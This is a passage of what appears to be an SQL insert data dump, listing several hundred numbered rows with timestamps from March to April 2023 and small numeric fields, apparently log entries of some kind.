(4348, '2023-03-21 17:25:13', 1, 2064, 0, 1, 1),
(4349, '2023-03-21 17:25:15', 1, 2063, 0, 1, 1),
(4350, '2023-03-21 17:25:16', 1, 2063, 0, 1, 1),
(4351, '2023-03-21 17:25:18', 1, 2062, 0, 1, 1),
(4352, '2023-03-21 17:25:20', 1, 2062, 0, 1, 1),
(4353, '2023-03-21 17:25:22', 1, 2061, 0, 1, 1),
(4354, '2023-03-21 17:25:24', 1, 2061, 0, 1, 1),
(4355, '2023-03-21 17:25:25', 1, 2060, 0, 1, 1),
(4356, '2023-03-21 17:25:27', 1, 2060, 0, 1, 1),
(4357, '2023-03-21 17:25:29', 1, 2059, 0, 1, 1),
(4358, '2023-03-21 17:25:31', 1, 2059, 0, 1, 1),
(4359, '2023-03-21 17:25:32', 1, 2058, 0, 1, 1),
(4360, '2023-03-21 17:25:34', 1, 2058, 0, 1, 1),
(4361, '2023-03-21 17:25:36', 1, 2055, 0, 1, 1),
(4362, '2023-03-21 17:25:38', 1, 2055, 0, 1, 1),
(4363, '2023-03-21 17:25:39', 1, 2061, 0, 1, 1),
(4364, '2023-03-21 17:25:41', 1, 2061, 0, 1, 1),
(4365, '2023-03-21 17:25:44', 1, 2059, 0, 1, 1),
(4366, '2023-03-21 17:25:45', 1, 2059, 0, 1, 1),
(4367, '2023-03-21 17:25:48', 1, 2058, 0, 1, 1),
(4368, '2023-03-21 17:25:50', 1, 2058, 0, 1, 1),
(4369, '2023-03-21 17:25:52', 1, 2054, 0, 1, 1),
(4370, '2023-03-21 17:25:54', 1, 2054, 0, 1, 1),
(4371, '2023-03-21 17:25:56', 1, 2064, 0, 1, 1),
(4372, '2023-03-21 17:25:58', 1, 2064, 0, 1, 1),
(4373, '2023-03-21 17:26:10', 1, 2064, 0, 1, 1),
(4374, '2023-03-21 17:26:12', 1, 2063, 0, 1, 1),
(4375, '2023-03-21 17:26:25', 1, 2063, 0, 1, 1),
(4376, '2023-03-21 17:26:27', 1, 2062, 0, 1, 1),
(4377, '2023-03-21 17:26:30', 1, 2062, 0, 1, 1),
(4378, '2023-03-21 17:26:32', 1, 2061, 0, 1, 1),
(4379, '2023-03-21 17:26:37', 1, 2061, 0, 1, 1),
(4380, '2023-03-21 22:39:29', 1, 2060, 0, 1, 1),
(4381, '2023-03-22 15:06:52', 1, 2060, 0, 1, 1),
(4382, '2023-03-23 07:53:08', 1, 2055, 0, 1, 1),
(4383, '2023-03-23 07:53:12', 1, 2064, 0, 1, 1),
(4384, '2023-03-23 07:53:16', 1, 2061, 0, 1, 1),
(4385, '2023-03-23 07:53:19', 1, 2058, 0, 1, 1),
(4386, '2023-03-23 20:34:14', 1, 2064, 0, 1, 1),
(4387, '2023-03-23 21:41:44', 1, 2053, 0, 1, 1),
(4388, '2023-03-24 04:16:49', 1, 2063, 0, 1, 1),
(4389, '2023-03-24 05:50:39', 1, 2060, 0, 1, 1),
(4390, '2023-03-24 06:03:35', 1, 2063, 0, 1, 1),
(4391, '2023-03-24 06:36:31', 1, 2058, 0, 1, 1),
(4392, '2023-03-24 07:00:40', 1, 2055, 0, 1, 1),
(4393, '2023-03-24 07:28:46', 1, 2055, 0, 1, 1),
(4394, '2023-03-24 07:37:13', 1, 2064, 0, 1, 1),
(4395, '2023-03-24 07:37:34', 1, 2063, 0, 1, 1),
(4396, '2023-03-24 07:37:48', 1, 2062, 0, 1, 1),
(4397, '2023-03-24 07:38:03', 1, 2061, 0, 1, 1),
(4398, '2023-03-24 07:38:18', 1, 2060, 0, 1, 1),
(4399, '2023-03-24 07:38:33', 1, 2059, 0, 1, 1),
(4400, '2023-03-24 07:38:46', 1, 2058, 0, 1, 1),
(4401, '2023-03-24 07:39:02', 1, 2055, 0, 1, 1),
(4402, '2023-03-24 07:39:20', 1, 2054, 0, 1, 1),
(4403, '2023-03-24 07:57:43', 1, 2053, 0, 1, 1),
(4404, '2023-03-24 08:59:15', 1, 2061, 0, 1, 1),
(4405, '2023-03-24 09:05:06', 1, 2060, 0, 1, 1),
(4406, '2023-03-24 09:48:33', 1, 2062, 0, 1, 1),
(4407, '2023-03-24 11:22:19', 1, 2054, 0, 1, 1),
(4408, '2023-03-24 11:41:30', 1, 2059, 0, 1, 1),
(4409, '2023-03-24 11:55:49', 1, 2064, 0, 1, 1),
(4410, '2023-03-24 15:06:50', 1, 2054, 0, 1, 1),
(4411, '2023-03-24 18:57:10', 1, 2062, 0, 1, 1),
(4412, '2023-03-24 20:08:24', 1, 2060, 0, 1, 1),
(4413, '2023-03-24 20:23:48', 1, 2063, 0, 1, 1),
(4414, '2023-03-24 21:03:59', 1, 2058, 0, 1, 1),
(4415, '2023-03-24 22:06:23', 1, 2055, 0, 1, 1),
(4416, '2023-03-24 23:00:39', 1, 2060, 0, 1, 1),
(4417, '2023-03-24 23:15:38', 1, 2063, 0, 1, 1),
(4418, '2023-03-24 23:17:58', 1, 2064, 0, 1, 1),
(4419, '2023-03-24 23:53:16', 1, 2058, 0, 1, 1),
(4420, '2023-03-25 00:52:35', 1, 2055, 0, 1, 1),
(4421, '2023-03-25 02:30:43', 1, 2061, 0, 1, 1),
(4422, '2023-03-25 03:23:08', 1, 2062, 0, 1, 1),
(4423, '2023-03-25 04:55:14', 1, 2054, 0, 1, 1),
(4424, '2023-03-25 05:14:57', 1, 2059, 0, 1, 1),
(4425, '2023-03-25 05:30:32', 1, 2064, 0, 1, 1),
(4426, '2023-03-25 08:20:14', 1, 2054, 0, 1, 1),
(4427, '2023-03-25 08:20:24', 1, 2055, 0, 1, 1),
(4428, '2023-03-25 08:21:11', 1, 2064, 0, 1, 1),
(4429, '2023-03-25 08:21:19', 1, 2063, 0, 1, 1),
(4430, '2023-03-25 08:21:28', 1, 2062, 0, 1, 1),
(4431, '2023-03-25 08:21:32', 1, 2060, 0, 1, 1),
(4432, '2023-03-25 08:21:35', 1, 2059, 0, 1, 1),
(4433, '2023-03-25 08:22:04', 1, 2061, 0, 1, 1),
(4434, '2023-03-25 08:22:07', 1, 2058, 0, 1, 1),
(4435, '2023-03-25 11:20:50', 1, 2060, 0, 1, 1),
(4436, '2023-03-25 13:34:25', 1, 2053, 0, 1, 1),
(4437, '2023-03-25 13:36:47', 1, 2053, 0, 1, 1),
(4438, '2023-03-25 13:37:55', 1, 2054, 0, 1, 1),
(4439, '2023-03-25 13:38:57', 1, 2053, 0, 1, 1),
(4440, '2023-03-25 13:40:25', 1, 2054, 0, 1, 1),
(4441, '2023-03-25 13:41:40', 1, 2055, 0, 1, 1),
(4442, '2023-03-25 13:42:48', 1, 2054, 0, 1, 1),
(4443, '2023-03-25 13:44:01', 1, 2055, 0, 1, 1),
(4444, '2023-03-25 13:49:37', 1, 2053, 0, 1, 1),
(4445, '2023-03-25 13:50:44', 1, 2054, 0, 1, 1),
(4446, '2023-03-25 13:51:52', 1, 2055, 0, 1, 1),
(4447, '2023-03-25 13:57:48', 1, 2064, 0, 1, 1),
(4448, '2023-03-25 14:00:15', 1, 2064, 0, 1, 1),
(4449, '2023-03-25 21:26:50', 1, 2060, 0, 1, 1),
(4450, '2023-03-25 21:28:25', 1, 2063, 0, 1, 1),
(4451, '2023-03-26 03:12:21', 1, 2060, 0, 1, 1),
(4452, '2023-03-26 03:18:16', 1, 2059, 0, 1, 1),
(4453, '2023-03-26 03:21:01', 1, 2061, 0, 1, 1),
(4454, '2023-03-26 04:50:27', 1, 2061, 0, 1, 1),
(4455, '2023-03-26 10:17:09', 1, 2064, 0, 1, 1),
(4456, '2023-03-26 19:13:18', 1, 2061, 0, 1, 1),
(4457, '2023-03-26 21:17:27', 1, 2063, 0, 1, 1),
(4458, '2023-03-26 23:00:33', 1, 2054, 0, 1, 1),
(4459, '2023-03-26 23:00:34', 1, 2063, 0, 1, 1),
(4460, '2023-03-26 23:00:37', 1, 2064, 0, 1, 1),
(4461, '2023-03-26 23:00:41', 1, 2062, 0, 1, 1),
(4462, '2023-03-26 23:00:42', 1, 2055, 0, 1, 1),
(4463, '2023-03-26 23:00:43', 1, 2059, 0, 1, 1),
(4464, '2023-03-26 23:00:44', 1, 2060, 0, 1, 1),
(4465, '2023-03-26 23:11:48', 1, 2055, 0, 1, 1),
(4466, '2023-03-27 10:37:13', 1, 2064, 0, 1, 1),
(4467, '2023-03-27 13:53:16', 1, 2061, 0, 1, 1),
(4468, '2023-03-27 13:53:17', 1, 2061, 0, 1, 1),
(4469, '2023-03-28 00:21:38', 1, 2058, 0, 1, 1),
(4470, '2023-03-28 00:21:52', 1, 2064, 0, 1, 1),
(4471, '2023-03-28 00:22:02', 1, 2062, 0, 1, 1),
(4472, '2023-03-28 00:22:03', 1, 2055, 0, 1, 1),
(4473, '2023-03-28 00:22:08', 1, 2059, 0, 1, 1),
(4474, '2023-03-28 00:22:10', 1, 2063, 0, 1, 1),
(4475, '2023-03-28 00:22:11', 1, 2061, 0, 1, 1),
(4476, '2023-03-28 00:22:13', 1, 2054, 0, 1, 1),
(4477, '2023-03-28 00:22:17', 1, 2060, 0, 1, 1),
(4478, '2023-03-28 00:23:46', 1, 2058, 0, 1, 1),
(4479, '2023-03-28 00:23:52', 1, 2064, 0, 1, 1),
(4480, '2023-03-28 00:23:58', 1, 2062, 0, 1, 1),
(4481, '2023-03-28 00:24:00', 1, 2055, 0, 1, 1),
(4482, '2023-03-28 00:24:04', 1, 2059, 0, 1, 1),
(4483, '2023-03-28 00:24:07', 1, 2063, 0, 1, 1),
(4484, '2023-03-28 00:24:09', 1, 2061, 0, 1, 1),
(4485, '2023-03-28 00:24:14', 1, 2060, 0, 1, 1),
(4486, '2023-03-28 00:24:17', 1, 2054, 0, 1, 1),
(4487, '2023-03-28 00:24:30', 1, 2053, 0, 1, 1),
(4488, '2023-03-28 00:47:04', 1, 2058, 0, 1, 1),
(4489, '2023-03-28 00:47:10', 1, 2064, 0, 1, 1),
(4490, '2023-03-28 00:47:15', 1, 2054, 0, 1, 1),
(4491, '2023-03-28 00:47:21', 1, 2062, 0, 1, 1),
(4492, '2023-03-28 00:47:24', 1, 2060, 0, 1, 1),
(4493, '2023-03-28 00:47:25', 1, 2055, 0, 1, 1),
(4494, '2023-03-28 00:47:31', 1, 2059, 0, 1, 1),
(4495, '2023-03-28 00:47:32', 1, 2063, 0, 1, 1),
(4496, '2023-03-28 00:47:33', 1, 2061, 0, 1, 1),
(4497, '2023-03-28 00:49:08', 1, 2058, 0, 1, 1),
(4498, '2023-03-28 00:49:13', 1, 2064, 0, 1, 1),
(4499, '2023-03-28 00:49:19', 1, 2054, 0, 1, 1),
(4500, '2023-03-28 00:49:22', 1, 2062, 0, 1, 1),
(4501, '2023-03-28 00:49:23', 1, 2055, 0, 1, 1),
(4502, '2023-03-28 00:49:27', 1, 2059, 0, 1, 1),
(4503, '2023-03-28 00:49:30', 1, 2063, 0, 1, 1),
(4504, '2023-03-28 00:49:31', 1, 2061, 0, 1, 1),
(4505, '2023-03-28 00:49:35', 1, 2060, 0, 1, 1),
(4506, '2023-03-28 00:49:48', 1, 2053, 0, 1, 1),
(4507, '2023-03-28 02:04:51', 1, 2064, 0, 1, 1),
(4508, '2023-03-28 05:01:35', 1, 2058, 0, 1, 1),
(4509, '2023-03-28 10:55:34', 1, 2055, 0, 1, 1),
(4510, '2023-03-28 19:51:29', 1, 2064, 0, 1, 1),
(4511, '2023-03-28 23:05:37', 1, 2061, 0, 1, 1),
(4512, '2023-03-29 01:54:21', 1, 2060, 0, 1, 1),
(4513, '2023-03-29 03:54:25', 1, 2053, 0, 1, 1),
(4514, '2023-03-29 12:56:40', 1, 2061, 0, 1, 1),
(4515, '2023-03-29 14:15:44', 1, 2055, 0, 1, 1),
(4516, '2023-03-29 19:20:46', 1, 2059, 0, 1, 1),
(4517, '2023-03-30 02:42:00', 1, 2054, 0, 1, 1),
(4518, '2023-03-30 08:35:19', 1, 2053, 0, 1, 1),
(4519, '2023-03-30 08:38:02', 1, 2053, 0, 1, 1),
(4520, '2023-03-30 08:39:30', 1, 2054, 0, 1, 1),
(4521, '2023-03-30 08:40:44', 1, 2053, 0, 1, 1),
(4522, '2023-03-30 08:42:08', 1, 2054, 0, 1, 1),
(4523, '2023-03-30 08:43:32', 1, 2055, 0, 1, 1),
(4524, '2023-03-30 08:44:53', 1, 2054, 0, 1, 1),
(4525, '2023-03-30 08:46:14', 1, 2055, 0, 1, 1),
(4526, '2023-03-30 08:51:36', 1, 2053, 0, 1, 1),
(4527, '2023-03-30 08:53:07', 1, 2054, 0, 1, 1),
(4528, '2023-03-30 08:54:30', 1, 2055, 0, 1, 1),
(4529, '2023-03-30 09:01:15', 1, 2064, 0, 1, 1),
(4530, '2023-03-30 09:03:57', 1, 2064, 0, 1, 1),
(4531, '2023-03-30 10:27:13', 1, 2059, 0, 1, 1),
(4532, '2023-03-30 12:56:39', 1, 2061, 0, 1, 1),
(4533, '2023-03-30 13:14:22', 1, 2053, 0, 1, 1),
(4534, '2023-03-30 13:16:58', 1, 2053, 0, 1, 1),
(4535, '2023-03-30 13:17:45', 1, 2053, 0, 1, 1),
(4536, '2023-03-30 13:18:18', 1, 2054, 0, 1, 1),
(4537, '2023-03-30 13:19:31', 1, 2053, 0, 1, 1),
(4538, '2023-03-30 13:20:53', 1, 2054, 0, 1, 1),
(4539, '2023-03-30 13:22:11', 1, 2055, 0, 1, 1),
(4540, '2023-03-30 13:23:33', 1, 2054, 0, 1, 1),
(4541, '2023-03-30 13:24:18', 1, 2053, 0, 1, 1),
(4542, '2023-03-30 13:25:05', 1, 2055, 0, 1, 1),
(4543, '2023-03-30 13:27:31', 1, 2054, 0, 1, 1),
(4544, '2023-03-30 13:30:09', 1, 2053, 0, 1, 1),
(4545, '2023-03-30 13:30:44', 1, 2053, 0, 1, 1),
(4546, '2023-03-30 13:31:40', 1, 2054, 0, 1, 1),
(4547, '2023-03-30 13:32:54', 1, 2055, 0, 1, 1),
(4548, '2023-03-30 13:34:13', 1, 2054, 0, 1, 1),
(4549, '2023-03-30 13:37:21', 1, 2055, 0, 1, 1),
(4550, '2023-03-30 13:39:39', 1, 2064, 0, 1, 1),
(4551, '2023-03-30 13:40:52', 1, 2054, 0, 1, 1),
(4552, '2023-03-30 13:42:20', 1, 2064, 0, 1, 1),
(4553, '2023-03-30 13:44:08', 1, 2055, 0, 1, 1),
(4554, '2023-03-30 13:57:39', 1, 2053, 0, 1, 1),
(4555, '2023-03-30 14:00:49', 1, 2054, 0, 1, 1),
(4556, '2023-03-30 14:04:17', 1, 2055, 0, 1, 1),
(4557, '2023-03-30 14:21:06', 1, 2064, 0, 1, 1),
(4558, '2023-03-30 14:27:48', 1, 2064, 0, 1, 1),
(4559, '2023-03-30 17:10:01', 1, 2053, 0, 1, 1),
(4560, '2023-03-30 17:14:59', 1, 2053, 0, 1, 1),
(4561, '2023-03-30 17:16:21', 1, 2054, 0, 1, 1),
(4562, '2023-03-30 17:17:43', 1, 2053, 0, 1, 1),
(4563, '2023-03-30 17:21:25', 1, 2054, 0, 1, 1),
(4564, '2023-03-30 17:24:55', 1, 2055, 0, 1, 1),
(4565, '2023-03-30 17:26:10', 1, 2054, 0, 1, 1),
(4566, '2023-03-30 17:27:42', 1, 2055, 0, 1, 1),
(4567, '2023-03-30 17:38:17', 1, 2053, 0, 1, 1),
(4568, '2023-03-30 17:42:25', 1, 2054, 0, 1, 1),
(4569, '2023-03-30 17:45:07', 1, 2055, 0, 1, 1),
(4570, '2023-03-30 17:56:35', 1, 2064, 0, 1, 1),
(4571, '2023-03-30 18:01:45', 1, 2064, 0, 1, 1),
(4572, '2023-03-31 02:47:20', 1, 2054, 0, 1, 1),
(4573, '2023-03-31 02:47:23', 1, 2055, 0, 1, 1),
(4574, '2023-03-31 02:47:27', 1, 2064, 0, 1, 1),
(4575, '2023-03-31 02:47:28', 1, 2062, 0, 1, 1),
(4576, '2023-03-31 02:47:29', 1, 2063, 0, 1, 1),
(4577, '2023-03-31 02:47:30', 1, 2059, 0, 1, 1),
(4578, '2023-03-31 02:47:31', 1, 2060, 0, 1, 1),
(4579, '2023-03-31 02:47:32', 1, 2058, 0, 1, 1),
(4580, '2023-03-31 02:47:33', 1, 2061, 0, 1, 1),
(4581, '2023-03-31 03:19:28', 1, 2053, 0, 1, 1),
(4582, '2023-03-31 03:22:25', 1, 2053, 0, 1, 1),
(4583, '2023-03-31 03:23:40', 1, 2054, 0, 1, 1),
(4584, '2023-03-31 03:25:04', 1, 2053, 0, 1, 1),
(4585, '2023-03-31 03:26:23', 1, 2054, 0, 1, 1),
(4586, '2023-03-31 03:27:36', 1, 2055, 0, 1, 1),
(4587, '2023-03-31 03:29:03', 1, 2054, 0, 1, 1),
(4588, '2023-03-31 03:30:17', 1, 2055, 0, 1, 1),
(4589, '2023-03-31 03:36:02', 1, 2053, 0, 1, 1),
(4590, '2023-03-31 03:37:20', 1, 2054, 0, 1, 1),
(4591, '2023-03-31 03:38:50', 1, 2055, 0, 1, 1),
(4592, '2023-03-31 03:45:51', 1, 2064, 0, 1, 1),
(4593, '2023-03-31 03:48:41', 1, 2064, 0, 1, 1),
(4594, '2023-03-31 17:55:53', 1, 2064, 0, 1, 1),
(4595, '2023-03-31 20:36:22', 1, 2053, 0, 1, 1),
(4596, '2023-03-31 20:40:41', 1, 2053, 0, 1, 1),
(4597, '2023-03-31 20:45:15', 1, 2054, 0, 1, 1),
(4598, '2023-03-31 20:46:41', 1, 2053, 0, 1, 1),
(4599, '2023-03-31 20:48:09', 1, 2054, 0, 1, 1),
(4600, '2023-03-31 20:54:01', 1, 2055, 0, 1, 1),
(4601, '2023-03-31 20:55:45', 1, 2054, 0, 1, 1),
(4602, '2023-03-31 20:57:08', 1, 2055, 0, 1, 1),
(4603, '2023-03-31 21:07:44', 1, 2053, 0, 1, 1),
(4604, '2023-03-31 21:10:25', 1, 2054, 0, 1, 1),
(4605, '2023-03-31 21:15:29', 1, 2055, 0, 1, 1),
(4606, '2023-03-31 21:28:14', 1, 2064, 0, 1, 1),
(4607, '2023-03-31 22:27:05', 1, 2058, 0, 1, 1),
(4608, '2023-03-31 22:27:14', 1, 2061, 0, 1, 1),
(4609, '2023-03-31 22:27:21', 1, 2059, 0, 1, 1),
(4610, '2023-03-31 22:27:27', 1, 2060, 0, 1, 1),
(4611, '2023-03-31 22:27:31', 1, 2062, 0, 1, 1),
(4612, '2023-03-31 22:27:39', 1, 2063, 0, 1, 1),
(4613, '2023-03-31 22:27:49', 1, 2064, 0, 1, 1),
(4614, '2023-03-31 22:29:16', 1, 2055, 0, 1, 1),
(4615, '2023-03-31 22:29:20', 1, 2054, 0, 1, 1),
(4616, '2023-03-31 22:29:26', 1, 2053, 0, 1, 1),
(4617, '2023-03-31 23:06:18', 1, 2058, 0, 1, 1),
(4618, '2023-03-31 23:07:04', 1, 2061, 0, 1, 1),
(4619, '2023-03-31 23:40:28', 1, 2058, 0, 1, 1),
(4620, '2023-03-31 23:50:29', 1, 2053, 0, 1, 1),
(4621, '2023-03-31 23:50:35', 1, 2054, 0, 1, 1),
(4622, '2023-03-31 23:50:41', 1, 2055, 0, 1, 1),
(4623, '2023-03-31 23:51:29', 1, 2064, 0, 1, 1),
(4624, '2023-03-31 23:51:35', 1, 2063, 0, 1, 1),
(4625, '2023-03-31 23:51:40', 1, 2062, 0, 1, 1),
(4626, '2023-03-31 23:51:45', 1, 2060, 0, 1, 1),
(4627, '2023-03-31 23:51:51', 1, 2059, 0, 1, 1),
(4628, '2023-03-31 23:51:57', 1, 2061, 0, 1, 1),
(4629, '2023-04-01 05:38:04', 1, 2061, 0, 1, 1),
(4630, '2023-04-01 06:18:48', 1, 2059, 0, 1, 1),
(4631, '2023-04-01 09:37:51', 1, 2060, 0, 1, 1),
(4632, '2023-04-01 16:06:12', 1, 2054, 0, 1, 1),
(4633, '2023-04-01 16:06:15', 1, 2055, 0, 1, 1),
(4634, '2023-04-01 16:06:28', 1, 2064, 0, 1, 1),
(4635, '2023-04-01 16:06:31', 1, 2063, 0, 1, 1),
(4636, '2023-04-01 16:06:36', 1, 2062, 0, 1, 1),
(4637, '2023-04-01 16:06:39', 1, 2060, 0, 1, 1),
(4638, '2023-04-01 16:06:42', 1, 2059, 0, 1, 1),
(4639, '2023-04-01 16:06:46', 1, 2061, 0, 1, 1),
(4640, '2023-04-01 16:06:48', 1, 2058, 0, 1, 1),
(4641, '2023-04-01 18:11:49', 1, 2064, 0, 1, 1),
(4642, '2023-04-01 22:21:24', 1, 2061, 0, 1, 1),
(4643, '2023-04-02 00:59:46', 1, 2053, 0, 1, 1),
(4644, '2023-04-02 01:08:06', 1, 2053, 0, 1, 1),
(4645, '2023-04-02 02:50:44', 1, 2053, 0, 1, 1),
(4646, '2023-04-02 06:10:08', 1, 2064, 0, 1, 1),
(4647, '2023-04-02 07:03:12', 1, 2059, 0, 1, 1),
(4648, '2023-04-02 08:37:44', 1, 2054, 0, 1, 1),
(4649, '2023-04-02 13:22:56', 1, 2061, 0, 1, 1),
(4650, '2023-04-02 15:18:44', 1, 2063, 0, 1, 1),
(4651, '2023-04-02 23:38:01', 1, 2063, 0, 1, 1),
(4652, '2023-04-03 02:13:58', 1, 2060, 0, 1, 1),
(4653, '2023-04-03 02:31:01', 1, 2062, 0, 1, 1),
(4654, '2023-04-03 10:13:15', 1, 2060, 0, 1, 1),
(4655, '2023-04-03 17:47:15', 1, 2063, 0, 1, 1),
(4656, '2023-04-03 19:36:57', 1, 2062, 0, 1, 1),
(4657, '2023-04-03 23:43:14', 1, 2060, 0, 1, 1),
(4658, '2023-04-03 23:44:19', 1, 2063, 0, 1, 1),
(4659, '2023-04-04 05:33:43', 1, 2053, 0, 1, 1),
(4660, '2023-04-04 07:04:24', 1, 2055, 0, 1, 1),
(4661, '2023-04-04 08:06:36', 1, 2061, 0, 1, 1),
(4662, '2023-04-04 11:03:52', 1, 2060, 0, 1, 1),
(4663, '2023-04-04 15:20:02', 1, 2064, 0, 1, 1),
(4664, '2023-04-05 00:20:20', 1, 2060, 0, 1, 1),
(4665, '2023-04-05 13:42:10', 1, 2064, 0, 1, 1),
(4666, '2023-04-05 16:06:33', 1, 2058, 0, 1, 1),
(4667, '2023-04-05 17:02:31', 1, 2064, 0, 1, 1),
(4668, '2023-04-05 22:43:16', 1, 2060, 0, 1, 1),
(4669, '2023-04-05 22:51:42', 1, 2063, 0, 1, 1),
(4670, '2023-04-05 23:13:53', 1, 2058, 0, 1, 1),
(4671, '2023-04-06 00:03:44', 1, 2055, 0, 1, 1),
(4672, '2023-04-06 00:51:58', 1, 2061, 0, 1, 1),
(4673, '2023-04-06 01:25:56', 1, 2061, 0, 1, 1),
(4674, '2023-04-06 02:05:30', 1, 2055, 0, 1, 1),
(4675, '2023-04-06 02:06:49', 1, 2062, 0, 1, 1),
(4676, '2023-04-06 03:25:26', 1, 2054, 0, 1, 1),
(4677, '2023-04-06 03:40:17', 1, 2059, 0, 1, 1),
(4678, '2023-04-06 03:53:11', 1, 2064, 0, 1, 1),
(4679, '2023-04-06 05:27:20', 1, 2061, 0, 1, 1),
(4680, '2023-04-06 06:09:12', 1, 2059, 0, 1, 1),
(4681, '2023-04-06 07:40:24', 1, 2064, 0, 1, 1),
(4682, '2023-04-06 08:51:28', 1, 2059, 0, 1, 1),
(4683, '2023-04-07 02:49:12', 1, 2053, 0, 1, 1),
(4684, '2023-04-07 14:46:59', 1, 2060, 0, 1, 1),
(4685, '2023-04-07 18:03:29', 1, 2054, 0, 1, 1),
(4686, '2023-04-08 01:48:29', 1, 2063, 0, 1, 1),
(4687, '2023-04-08 04:23:27', 1, 2064, 0, 1, 1),
(4688, '2023-04-08 07:32:10', 1, 2064, 0, 1, 1),
(4689, '2023-04-08 08:58:41', 1, 2061, 0, 1, 1),
(4690, '2023-04-08 10:27:08', 1, 2061, 0, 1, 1),
(4691, '2023-04-08 11:09:54', 1, 2063, 0, 1, 1),
(4692, '2023-04-08 11:10:28', 1, 2063, 0, 1, 1),
(4693, '2023-04-08 14:44:24', 1, 2063, 0, 1, 1),
(4694, '2023-04-08 18:42:25', 1, 2054, 0, 1, 1),
(4695, '2023-04-09 01:16:51', 1, 2062, 0, 1, 1),
(4696, '2023-04-09 02:29:06', 1, 2062, 0, 1, 1),
(4697, '2023-04-09 07:21:32', 1, 2064, 0, 1, 1),
(4698, '2023-04-09 07:50:51', 1, 2064, 0, 1, 1),
(4699, '2023-04-09 08:36:41', 1, 2063, 0, 1, 1),
(4700, '2023-04-11 04:13:43', 1, 2053, 0, 1, 1),
(4701, '2023-04-11 14:45:03', 1, 2060, 0, 1, 1),
(4702, '2023-04-12 10:00:26', 1, 2064, 0, 1, 1),
(4703, '2023-04-12 11:10:48', 1, 2063, 0, 1, 1),
(4704, '2023-04-12 12:32:10', 1, 2055, 0, 1, 1),
(4705, '2023-04-12 20:31:34', 1, 2059, 0, 1, 1),
(4706, '2023-04-13 10:30:40', 1, 2058, 0, 1, 1),
(4707, '2023-04-13 11:06:04', 1, 2064, 0, 1, 1),
(4708, '2023-04-14 04:37:16', 1, 2060, 0, 1, 1),
(4709, '2023-04-14 04:37:16', 1, 2064, 0, 1, 1),
(4710, '2023-04-14 04:37:16', 1, 2058, 0, 1, 1),
(4711, '2023-04-14 04:37:16', 1, 2054, 0, 1, 1),
(4712, '2023-04-14 04:37:18', 1, 2059, 0, 1, 1),
(4713, '2023-04-14 04:37:18', 1, 2061, 0, 1, 1),
(4714, '2023-04-14 04:37:19', 1, 2055, 0, 1, 1),
(4715, '2023-04-14 04:37:23', 1, 2062, 0, 1, 1),
(4716, '2023-04-14 04:37:25', 1, 2063, 0, 1, 1),
(4717, '2023-04-14 06:07:20', 1, 2059, 0, 1, 1),
(4718, '2023-04-14 11:37:43', 1, 2062, 0, 1, 1),
(4719, '2023-04-14 15:06:35', 1, 2064, 0, 1, 1),
(4720, '2023-04-14 16:46:51', 1, 2054, 0, 1, 1),
(4721, '2023-04-14 18:30:51', 1, 2064, 0, 1, 1),
(4722, '2023-04-15 00:33:31', 1, 2062, 0, 1, 1),
(4723, '2023-04-15 00:43:31', 1, 2053, 0, 1, 1),
(4724, '2023-04-15 02:05:02', 1, 2054, 0, 1, 1),
(4725, '2023-04-15 19:36:46', 1, 2061, 0, 1, 1),
(4726, '2023-04-16 03:36:26', 1, 2054, 0, 1, 1),
(4727, '2023-04-16 03:37:03', 1, 2055, 0, 1, 1),
(4728, '2023-04-16 03:39:21', 1, 2064, 0, 1, 1),
(4729, '2023-04-16 03:39:57', 1, 2063, 0, 1, 1),
(4730, '2023-04-16 03:40:32', 1, 2062, 0, 1, 1),
(4731, '2023-04-16 03:41:06', 1, 2060, 0, 1, 1),
(4732, '2023-04-16 03:41:41', 1, 2059, 0, 1, 1),
(4733, '2023-04-16 03:42:16', 1, 2061, 0, 1, 1),
(4734, '2023-04-16 03:42:51', 1, 2058, 0, 1, 1),
(4735, '2023-04-16 04:17:25', 1, 2064, 0, 1, 1),
(4736, '2023-04-16 09:54:26', 1, 2064, 0, 1, 1),
(4737, '2023-04-16 10:42:55', 1, 2058, 0, 1, 1),
(4738, '2023-04-16 12:03:54', 1, 2055, 0, 1, 1),
(4739, '2023-04-16 12:04:02', 1, 2064, 0, 1, 1),
(4740, '2023-04-16 12:04:05', 1, 2063, 0, 1, 1),
(4741, '2023-04-16 12:04:08', 1, 2062, 0, 1, 1),
(4742, '2023-04-16 12:04:11', 1, 2060, 0, 1, 1),
(4743, '2023-04-17 05:32:22', 1, 2063, 0, 1, 1),
(4744, '2023-04-17 05:32:34', 1, 2063, 0, 1, 1),
(4745, '2023-04-17 14:59:11', 1, 2058, 0, 1, 1),
(4746, '2023-04-18 01:38:54', 1, 2054, 0, 1, 1),
(4747, '2023-04-18 02:18:39', 1, 2060, 0, 1, 1),
(4748, '2023-04-18 02:57:59', 1, 2061, 0, 1, 1),
(4749, '2023-04-18 03:54:59', 1, 2059, 0, 1, 1),
(4750, '2023-04-18 04:36:45', 1, 2064, 0, 1, 1),
(4751, '2023-04-18 04:50:26', 1, 2064, 0, 1, 1),
(4752, '2023-04-18 05:12:43', 1, 2062, 0, 1, 1),
(4753, '2023-04-18 06:07:09', 1, 2055, 0, 1, 1),
(4754, '2023-04-18 06:58:52', 1, 2063, 0, 1, 1),
(4755, '2023-04-18 07:13:18', 1, 2058, 0, 1, 1),
(4756, '2023-04-18 18:39:01', 1, 2053, 0, 1, 1),
(4757, '2023-04-19 09:42:24', 1, 2059, 0, 1, 1),
(4758, '2023-04-19 16:31:40', 1, 2062, 0, 1, 1),
(4759, '2023-04-19 17:19:12', 1, 2063, 0, 1, 1),
(4760, '2023-04-20 00:13:19', 1, 2064, 0, 1, 1),
(4761, '2023-04-20 18:33:29', 1, 2064, 0, 1, 1),
(4762, '2023-04-20 19:28:44', 1, 2063, 0, 1, 1),
(4763, '2023-04-20 21:57:36', 1, 2054, 0, 1, 1),
(4764, '2023-04-21 00:13:20', 1, 2064, 0, 1, 1),
(4765, '2023-04-21 04:15:17', 1, 2059, 0, 1, 1),
(4766, '2023-04-21 07:06:04', 1, 2062, 0, 1, 1),
(4767, '2023-04-21 10:48:33', 1, 2059, 0, 1, 1),
(4768, '2023-04-21 13:39:39', 1, 2064, 0, 1, 1),
(4769, '2023-04-21 17:52:14', 1, 2062, 0, 1, 1),
(4770, '2023-04-21 20:42:28', 1, 2053, 0, 1, 1),
(4771, '2023-04-21 22:25:47', 1, 2064, 0, 1, 1),
(4772, '2023-04-21 22:53:06', 1, 2054, 0, 1, 1),
(4773, '2023-04-22 00:40:42', 1, 2061, 0, 1, 1),
(4774, '2023-04-22 01:11:48', 1, 2060, 0, 1, 1),
(4775, '2023-04-22 03:48:54', 1, 2055, 0, 1, 1),
